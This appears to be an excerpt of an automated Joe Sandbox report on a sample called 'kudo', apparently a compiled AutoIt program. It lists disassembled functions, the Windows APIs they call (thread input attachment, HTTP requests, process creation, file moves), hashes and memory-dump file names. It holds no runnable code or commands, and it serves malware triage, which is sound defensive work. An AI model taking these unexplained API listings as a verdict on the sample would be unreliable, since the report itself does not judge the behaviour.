                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ArraySafeVartype
                                                      • String ID:
                                                      • API String ID: 1725837607-0
                                                      • Opcode ID: debb71154980d07e40f20dc2e7307c4d827e2d3acdf815b34392fe4188035e49
                                                      • Instruction ID: 7f9eebb2eb27108c69c1d02f2750bb8dd1ea9ef46e01ed282a0f8aa33351f608
                                                      • Opcode Fuzzy Hash: debb71154980d07e40f20dc2e7307c4d827e2d3acdf815b34392fe4188035e49
                                                      • Instruction Fuzzy Hash: B3B1AF7190421A9FDB10DFA8D885BBEB7F4FF09329F224429E641EB291D734A941CBD1
                                                      Function 008611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32(?,?,?,?,?,00860268,?,00000001), ref: 008611F0
                                                      • GetForegroundWindow.USER32 ref: 00861204
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0086120B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0086121A
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0086122C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00861245
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00861257
                                                      • AttachThreadInput.USER32(00000000,00000000), ref: 0086129C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 008612B1
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 008612BC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: ec1810bc4795bd5b4b533a4cb0d6aa7263f70cc48c536c5f65f6fb0c9a4d7798
                                                      • Instruction ID: 94913e8665c57bd0c1b718785faddd381c8c8c8f749082909420b160769076a3
                                                      • Opcode Fuzzy Hash: ec1810bc4795bd5b4b533a4cb0d6aa7263f70cc48c536c5f65f6fb0c9a4d7798
                                                      • Instruction Fuzzy Hash: 8C31AE75610208ABDF10DF54FC58F6937BAFF54315F154229F901C72A2EB74AD508B50
                                                      Function 0080FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0080FAA6
                                                      • OleUninitialize.OLE32(?,00000000), ref: 0080FB45
                                                      • UnregisterHotKey.USER32(?), ref: 0080FC9C
                                                      • DestroyWindow.USER32(?), ref: 008445D6
                                                      • FreeLibrary.KERNEL32(?), ref: 0084463B
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00844668
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 64cb4a2f48bc246a076d4a7bfa55849c48f7152434dfecb0e763d8b46eabb4d1
                                                      • Instruction ID: 97f13684d663195bb9d0d620bdda0e8fd70fe302d364f9d354957617b921e685
                                                      • Opcode Fuzzy Hash: 64cb4a2f48bc246a076d4a7bfa55849c48f7152434dfecb0e763d8b46eabb4d1
                                                      • Instruction Fuzzy Hash: 38A17C303012268FDB68EF18C895B69F764FF15714F1142ADE90AEB6A2DB30AC56CF51
                                                      Function 0085A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnumChildWindows.USER32(?,0085A439), ref: 0085A377
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 3555792229-1603158881
                                                      • Opcode ID: 84b2da52cfd04f086e86299e81b292152afd29356db1daf36b62ef1c8d11355e
                                                      • Instruction ID: 78cbaef5d5192757c552b90a66ffbd53bb3540ac30e7c9aa77a290a29c74f6ae
                                                      • Opcode Fuzzy Hash: 84b2da52cfd04f086e86299e81b292152afd29356db1daf36b62ef1c8d11355e
                                                      • Instruction Fuzzy Hash: BF919431500615AACB0CDFA4C8D2BEDFB64FF04305F548229ED5AE7291DB31699DCB92
                                                      Function 00802E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00802EAE
                                                        • Part of subcall function 00801DB3: GetClientRect.USER32(?,?), ref: 00801DDC
                                                        • Part of subcall function 00801DB3: GetWindowRect.USER32(?,?), ref: 00801E1D
                                                        • Part of subcall function 00801DB3: ScreenToClient.USER32(?,?), ref: 00801E45
                                                      • GetDC.USER32 ref: 0083CD32
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0083CD45
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0083CD53
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0083CD68
                                                      • ReleaseDC.USER32(?,00000000), ref: 0083CD70
                                                      • MoveWindow.USER32(?,?,?,?,?,?), ref: 0083CDFB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: bea5ea6e766351891da99b46b8e21f535005114bfb31308716cc6cb86595ee8d
                                                      • Instruction ID: 5071d300afdcc05d03021da4989434cdbd01615d95715436e6f5c4438a94662b
                                                      • Opcode Fuzzy Hash: bea5ea6e766351891da99b46b8e21f535005114bfb31308716cc6cb86595ee8d
                                                      • Instruction Fuzzy Hash: 4571B231500209DFCF21DF64CC84AAA7BB5FF88324F14427AFD55EA2A6D7319891DBA1
                                                      Function 00871A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00871A50
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00871A7C
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00871ABE
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00871AD3
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00871AE0
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00871B10
                                                      • InternetCloseHandle.WININET(00000000), ref: 00871B57
                                                        • Part of subcall function 00872483: GetLastError.KERNEL32(?,?,00871817,00000000,00000000,00000001), ref: 00872498
                                                        • Part of subcall function 00872483: SetEvent.KERNEL32(?,?,00871817,00000000,00000000,00000001), ref: 008724AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                      • String ID:
                                                      • API String ID: 2603140658-3916222277
                                                      • Opcode ID: d6c81f05a94f56ba8305eafdfbb02d4feaabc941238824ff3750ce9c3ff2cec8
                                                      • Instruction ID: 22978e76ebf57238b55aa65cbca96c6c0c19c47f3ce5e7fd5eac40f8062ad048
                                                      • Opcode Fuzzy Hash: d6c81f05a94f56ba8305eafdfbb02d4feaabc941238824ff3750ce9c3ff2cec8
                                                      • Instruction Fuzzy Hash: B5414CB1501218BFEF119F58CC89FBA7BACFB08354F10812AFA09DA145E774DE449BA5
                                                      Function 00803015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 72registrywindowclipboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00803074
                                                      • RegisterClassExW.USER32(00000030), ref: 0080309E
                                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008030AF
                                                      • LoadIconW.USER32(000000A9), ref: 008030F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 975902462-1005189915
                                                      • Opcode ID: 7d5d5bcb97a139039b6f76d2942de6fcece8851edba142a60736743bbedc0a50
                                                      • Instruction ID: fdf5fa890a4c95e05c800702c6706a058c103efe3516c985ec4c5d178ce89bab
                                                      • Opcode Fuzzy Hash: 7d5d5bcb97a139039b6f76d2942de6fcece8851edba142a60736743bbedc0a50
                                                      • Instruction Fuzzy Hash: 843129B1850309EFDB51DFA8EC89A8DBBF0FB09320F20416AF691E62A1D7B51585CF51
                                                      Function 00803041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00803074
                                                      • RegisterClassExW.USER32(00000030), ref: 0080309E
                                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008030AF
                                                      • LoadIconW.USER32(000000A9), ref: 008030F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 975902462-1005189915
                                                      • Opcode ID: 34d1ec6fd9313b05d5b3eaa3de96ab8e490d72b03dbb37e2de522bd52217b3ad
                                                      • Instruction ID: b1d2def8e16319767fa1a79f3976139b5503459a83f1da2e2484dc63966db5f2
                                                      • Opcode Fuzzy Hash: 34d1ec6fd9313b05d5b3eaa3de96ab8e490d72b03dbb37e2de522bd52217b3ad
                                                      • Instruction Fuzzy Hash: 8E21C7B1911618AFEF00DFA8EC49B9EBBF4FB08710F10412AF611E62A1D7B15584CF91
                                                      Function 00878C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0088F910), ref: 00878D28
                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0088F910), ref: 00878D5C
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00878ED6
                                                      • SysFreeString.OLEAUT32(?), ref: 00878F00
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                      • String ID:
                                                      • API String ID: 560350794-0
                                                      • Opcode ID: bfb49c104feb6fa3e9886957d5083c033e193851d89fcc55dae3f24d4de6753a
                                                      • Instruction ID: d64a7648dfba6dd5eac75d164e1d1239e3dd5b0f9df64e2e6d87dd24b841ec7e
                                                      • Opcode Fuzzy Hash: bfb49c104feb6fa3e9886957d5083c033e193851d89fcc55dae3f24d4de6753a
                                                      • Instruction Fuzzy Hash: 0AF10471A00209EFDB14DF98C888AAEB7B9FF49314F108498F949EB255DB31EE45CB51
                                                      Function 0087F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0087F6B5
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0087F848
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0087F86C
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0087F8AC
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0087F8CE
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0087FA4A
                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0087FA7C
                                                      • CloseHandle.KERNEL32(?), ref: 0087FAAB
                                                      • CloseHandle.KERNEL32(?), ref: 0087FB22
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                      • String ID:
                                                      • API String ID: 4090791747-0
                                                      • Opcode ID: 24ae34af61f9e22ce52bd5f6d50a539ab26365c289912edad8c625ba7a3a46fc
                                                      • Instruction ID: f0ecc0f16ca4b6cb49dcb6fd50694b926521f3f9e8d7ab2c6eb2c4851286dc76
                                                      • Opcode Fuzzy Hash: 24ae34af61f9e22ce52bd5f6d50a539ab26365c289912edad8c625ba7a3a46fc
                                                      • Instruction Fuzzy Hash: 01E1AC712042509FC714EF29C891B6ABBE1FF89354F14856DFA99DB2A2DB30DC41CB52
                                                      Function 0080201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00801B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00801B9A
                                                      • DestroyWindow.USER32(?), ref: 008020D3
                                                      • KillTimer.USER32(-00000001,?), ref: 0080216E
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0083BCA6
                                                      • DeleteObject.GDI32(00000000), ref: 0083BD1C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 2402799130-0
                                                      • Opcode ID: fdd57b5bbd00154442c3c8aa846fed793e3f80be7ed7f6093fc8ac35bc943130
                                                      • Instruction ID: e7eab0f31d1100de763a35346fa0264e8146c8c00729d557c309543d5e5c0a87
                                                      • Opcode Fuzzy Hash: fdd57b5bbd00154442c3c8aa846fed793e3f80be7ed7f6093fc8ac35bc943130
                                                      • Instruction Fuzzy Hash: B5617531110B00DFDB75AF18DD4CB2AB7F2FB80316F508529E642CA9A1C7B4B891DB91
                                                      Function 00864CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0086466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00863697,?), ref: 0086468B
                                                        • Part of subcall function 0086466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00863697,?), ref: 008646A4
                                                        • Part of subcall function 00864A31: GetFileAttributesW.KERNEL32(?,0086370B), ref: 00864A32
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00864D40
                                                      • _wcscmp.LIBCMT ref: 00864D5A
                                                      • MoveFileW.KERNEL32(?,?), ref: 00864D75
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                      • String ID:
                                                      • API String ID: 793581249-0
                                                      • Opcode ID: a2b47cc65f763c9c9839ef0d35a37353a9a5ed0f14895435acc1d94a8d8c25d2
                                                      • Instruction ID: 1617221ef26b2f37e3814e86a3b71d7b9e881341252c2e0223aa6e740f19dd5e
                                                      • Opcode Fuzzy Hash: a2b47cc65f763c9c9839ef0d35a37353a9a5ed0f14895435acc1d94a8d8c25d2
                                                      • Instruction Fuzzy Hash: 0C5150B24083459BC664EBA4D8819DFB7ECFF85350F00192EB689D3192EE35A588C767
                                                      Function 00888645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 008886FF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
